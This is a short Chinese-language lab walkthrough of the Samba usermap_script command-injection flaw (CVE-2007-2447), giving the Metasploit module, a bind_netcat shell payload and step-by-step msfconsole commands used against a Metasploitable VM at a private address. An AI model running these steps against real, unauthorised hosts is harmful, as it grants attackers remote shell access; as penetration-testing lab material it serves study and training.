Samba远程Shell命令注入执行漏洞(CVE-2007-2447)

usermap_script:CVE-2007-2447
Samba用户名映射脚本命令执行

漏洞产生原因

传递通过MS-RPC提供的未过滤的用户输入在调用定义的外部脚本时调用/bin/sh,在smb.conf中,导致允许远程命令执行。

msf 中模块位置

exploit/multi/samba/usermap_script

这个模块利用漏洞执行命令,在Samba版本3.0.20到3.0.25rc3当使用非默认用户名映射脚本配置选项。
通过指定一个用户名包含shell元字符,攻击者可以执行任意命令。
不需要身份验证来利用此漏洞,因为此选项用于在身份验证之前映射用户名

漏洞复现

攻击机 kali
IP 192.168.195.133

靶机 Metasploitable_ubuntu
IP 192.168.195.132

  1. 搜索有关samba漏洞的代码库

    search samba

  2. 使用usermap_script代码

    use exploit/multi/samba/usermap_script

1.png

  1. 查看攻击载荷

    show payloads

并选择bind_netcat即使用netcat工具在渗透攻击成功后执行shell并通过netcat绑定在一个监听端口上

set payload cmd/unix/bind_netcat

2.png

  1. 查看参数配置

    show options

3.png

  1. 设置目标ip

    set RHOST 192.168.195.132

4.png

  1. 执行exploit成功获取靶机shell

    exploit

5.png